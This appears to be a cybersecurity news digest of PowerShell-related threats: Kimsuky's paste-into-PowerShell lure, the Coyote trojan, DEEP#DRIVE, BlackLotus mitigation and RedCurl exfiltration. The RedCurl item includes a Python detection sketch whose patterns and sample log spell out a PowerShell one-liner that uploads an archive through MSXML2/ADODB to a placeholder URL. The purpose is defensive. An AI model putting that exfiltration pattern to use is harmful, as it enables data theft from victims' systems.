CyberSecurity news

FlagThis - #powershell

@gbhackers.com //
North Korean hackers, specifically the Kimsuky APT group (also known as Emerald Sleet), have been observed employing a new tactic to compromise targets. The group is tricking individuals into running PowerShell as an administrator, then instructing them to paste and execute malicious code they provide. The threat actor masquerades as a South Korean government official, building rapport before sending a spear-phishing email with a PDF attachment containing instructions to open PowerShell as an administrator and paste a specific code snippet.

If the target executes the code, it downloads and installs a browser-based remote desktop tool along with a certificate and PIN. The code then sends a web request to register the victim device, granting the threat actor access for data exfiltration. Microsoft Threat Intelligence has observed this tactic in limited attacks since January 2025, describing it as a departure from the threat actor's usual tradecraft.

Recommended read:
References:
  • gbhackers.com: Microsoft Threat Intelligence has exposed a novel cyberattack method employed by the North Korean state-sponsored hacking group, Emerald Sleet (also known as Kimsuky or VELVET CHOLLIMA).
  • securityaffairs.com: North Korea-linked APT Emerald Sleet is using a new tactic
  • The Hacker News: The North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets.
  • BleepingComputer: North Korean state actor 'Kimsuky' (aka 'Emerald Sleet' or 'Velvet Chollima') has been observed using a new tactic inspired from the now widespread ClickFix campaigns.
  • Microsoft Threat Intelligence has observed North Korean state actor Emerald Sleet (also known as Kimsuky and VELVET CHOLLIMA) using a new tactic: tricking targets into running PowerShell as an administrator and then pasting and running code provided by the threat actor.
  • www.bleepingcomputer.com: Reports on Emerald Sleet's activity exploiting PowerShell.
  • www.microsoft.com: The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation
  • www.scworld.com: PowerShell exploited in new Kimsuky intrusions
  • Talkback Resources: Kimsuky, a North Korean nation-state threat actor, is conducting an ongoing cyber attack campaign named DEEP#DRIVE targeting South Korean business, government, and cryptocurrency sectors using tailored phishing lures and leveraging PowerShell scripts and Dropbox for payload delivery and data exfiltration.
  • The Hacker News: North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks
  • MSSP feed for Latest: Ongoing Kimsuky Attack Campaign Exploits PowerShell, Dropbox
  • securityaffairs.com: Analyzing DEEP#DRIVE: North Korean

@securityonline.info //
Fortinet's FortiGuard Labs has issued a high-severity alert regarding the Coyote Banking Trojan. This sophisticated malware, targeting Microsoft Windows users, has expanded its reach to include 1,030 websites and 73 financial institutions. The malware is distributed through malicious LNK files that execute PowerShell commands, initiating a multi-stage attack. The primary goal is to harvest sensitive data, including system details and lists of installed antivirus products.

The attack sequence begins with the LNK file executing a PowerShell command that retrieves a next-stage PowerShell script, which launches the trojan. Once deployed, the trojan gathers system information and evades detection by security tools. When a victim visits one of the targeted sites, the malware contacts a command-and-control server, which can instruct it to capture screenshots or display phishing overlays that steal sensitive credentials.

Recommended read:
References:
  • gbhackers.com: FortiGuard Labs has issued a high-severity alert regarding the Coyote Banking Trojan, a sophisticated malware targeting Microsoft Windows users.
  • www.scworld.com: Updated Coyote malware facilitates more extensive compromise
  • gbhackers.com: Coyote Malware Launches Stealthy Attack on Windows Systems via LNK Files
  • The Hacker News: Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions
  • securityonline.info: SecurityOnline article about the multi-stage Coyote banking trojan targeting Brazil.
  • securityaffairs.com: Coyote Banking Trojan targets Brazilian users, stealing data from 70+ financial apps and websites
  • securityonline.info: Coyote Banking Trojan: A Multi-Stage Financial Cyber Threat Targeting Brazil

@gbhackers.com //
North Korean state-backed threat group Kimsuky, also known as APT43, is actively targeting South Korean entities through a sophisticated cyber campaign, dubbed DEEP#DRIVE. This ongoing operation, potentially active since September, involves attacks leveraging PowerShell and Dropbox against South Korean government, business, and cryptocurrency firms. The attackers initiate intrusions with phishing emails containing a ZIP archive with an LNK file, disguised as legitimate documents, to trick recipients into triggering the infection process.

The attack chain relies heavily on PowerShell scripts for various stages, including payload delivery, reconnaissance, and execution, as well as using Dropbox for payload distribution and data exfiltration. Upon execution, the LNK file initiates a PowerShell script that retrieves a lure document hosted on Dropbox. It also retrieves another PowerShell script for system data exfiltration and installs a third script to execute an unknown .NET assembly. This cloud-based infrastructure enables stealthy payload hosting and retrieval, complicating detection efforts.


@securityonline.info //
Microsoft has released a PowerShell script designed to help Windows users and administrators update bootable media. The purpose of this update is to utilize the new "Windows UEFI CA 2023" certificate, which is critical for mitigating threats posed by the BlackLotus UEFI bootkit. This bootkit is capable of bypassing Secure Boot and gaining control over the operating system's boot process, potentially disabling crucial Windows security features.

The PowerShell script enables IT administrators to update the Windows Boot Manager’s certificates to align with the latest security standards. It supports various bootable media types, including ISO CD/DVD image files, USB flash drives, local drive paths, and network drive paths. To execute the update, the Windows ADK (Assessment and Deployment Kit) must be installed.

Recommended read:
References:
  • BleepingComputer: Microsoft has released a PowerShell script to help Windows users and admins update bootable media so it utilizes the new "Windows UEFI CA 2023" certificate before the mitigations of the BlackLotus UEFI bootkit are enforced later this year.
  • securityonline.info: Microsoft Releases PowerShell Script for UEFI Certificate Update
  • Cybersecurity News: Although support for Windows 8 has long since ended, Windows 11 still retains UEFI digital certificates issued during

Oleg (noreply@blogger.com)@Know Your Adversary //
The RedCurl APT, also known as Earth Kapre or Red Wolf, has been observed abusing PowerShell for data collection and exfiltration. According to a report by eSentire, this sophisticated cyber espionage group actively targets private sector organizations, with a particular focus on corporate espionage. The attackers split the intrusion into multiple stages to slip past conventional defenses, starting with phishing lures.

RedCurl leverages PowerShell in several key steps of its attacks. First, 7-Zip is used to archive the collected data, with specific command-line parameters such as "x", "-aoa", "-p", and "-o" observed during the archival process. PowerShell is then used to exfiltrate the archived data via MSXML2.ServerXMLHTTP and ADODB.Stream, employing commands such as "LoadFromFile", "PUT", and "Send". eSentire's Threat Response Unit (TRU) advises tracking these specific PowerShell executions and command-line arguments to detect and mitigate RedCurl's activity.
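A detection sketch for the TRU recommendation above, added here as an example rather than code from eSentire or this blog: it scans constructed PowerShell ScriptBlock-logging (Event ID 4104) lines for the 7-Zip switches and the MSXML2.ServerXMLHTTP/ADODB.Stream method names the report calls out, and alerts only when a full indicator set appears in a single script block. The log line layout and the sample events are assumptions.

```python
"""Detection sketch for the RedCurl PowerShell behaviour described above.
Added example, not eSentire's or the blog's code. Log lines are constructed to
resemble PowerShell ScriptBlock logging (Event ID 4104); their layout is assumed."""
import re

# Indicator families named in the report. Every pattern in a family must appear
# in one script block for it to fire, so an ordinary 7z extraction or a lone
# ADODB.Stream reference does not alert on its own.
RULES = {
    "7zip-password-archive": [
        re.compile(r"\b7z(a|\.exe)?\b", re.I),
        re.compile(r"(^|\s)-p\S*", re.I),    # -p<password>
        re.compile(r"(^|\s)-aoa\b", re.I),   # overwrite all without prompting
        re.compile(r"(^|\s)-o\S+", re.I),    # -o<output directory>
    ],
    "msxml-adodb-exfil": [
        re.compile(r"MSXML2\.ServerXMLHTTP", re.I),
        re.compile(r"ADODB\.Stream", re.I),
        re.compile(r"\.LoadFromFile\(", re.I),
        re.compile(r"\.Open\(\s*['\"]PUT['\"]", re.I),
        re.compile(r"\.Send\(", re.I),
    ],
}

def scan_script_block(text):
    """Return the rule families whose indicators all appear in one script block."""
    return [name for name, pats in RULES.items() if all(p.search(text) for p in pats)]

def scan_log(lines):
    """Return (event_id, fired_rules) for each 4104-style line that alerts."""
    hits = []
    for line in lines:
        # Assumed layout: "<id> 4104 <host> ScriptBlockText=<script text>"
        m = re.match(r"(\S+)\s+4104\s+\S+\s+ScriptBlockText=(.*)", line)
        if not m:          # other event IDs or malformed lines are skipped
            continue
        fired = scan_script_block(m.group(2))
        if fired:
            hits.append((m.group(1), fired))
    return hits

# Constructed sample events: benign, plain 7z extraction, password-protected 7z,
# COM-based upload (placeholders instead of real paths/URLs), unrelated 4688.
SAMPLE_LOG = [
    r"evt-001 4104 WS01 ScriptBlockText=Get-ChildItem C:\Users | Export-Csv out.csv",
    r"evt-002 4104 WS01 ScriptBlockText=& 7z.exe x update.7z -oC:\Temp",
    r"evt-003 4104 WS02 ScriptBlockText=& 7z.exe x C:\ProgramData\pkg.7z -aoa -pSECRET -oC:\ProgramData\out",
    r"evt-004 4104 WS02 ScriptBlockText=$st = New-Object -ComObject ADODB.Stream; $st.LoadFromFile('<staged archive>'); "
    r"$rq = New-Object -ComObject MSXML2.ServerXMLHTTP; $rq.Open('PUT', '<upload url>', $false); $rq.Send(<bytes>)",
    r"evt-005 4688 WS02 NewProcessName=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
]
```

Running `scan_log(SAMPLE_LOG)` flags evt-003 for the 7-Zip rule and evt-004 for the COM upload rule only; the plain extraction in evt-002 stays quiet.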

Recommended read:
References:
  • www.esentire.com: eSentire report on RedCurl abusing PowerShell.
  • Know Your Adversary: RedCurl Abuses PowerShell for Collection and Exfiltration: Detection Opportunities
  • Information Security Buzz: eSentire Uncovers EarthKapre/RedCurl Attack Targeting Law Firms
  • socprime.com: RedCurl/EarthKapre APT Attack Detection: A Sophisticated Cyber-Espionage Group Uses a Legitimate Adobe Executable to Deploy a Loader
  • Virus Bulletin: eSentire researchers summarise a recent investigation into an attack by the RedCurl/EarthKapre APT against an organization within the legal services industry. The group primarily targets private-sector organizations with a focus on corporate espionage.
  • SOC Prime Blog: The nefarious cyber-espionage hacking collective tracked as EarthKapre or RedCurl APT has resurfaced to target legal sector organizations using Indeed-themed phishing.
  • Talkback Resources: Unraveling the Many Stages and Techniques Used by RedCurl/EarthKapre…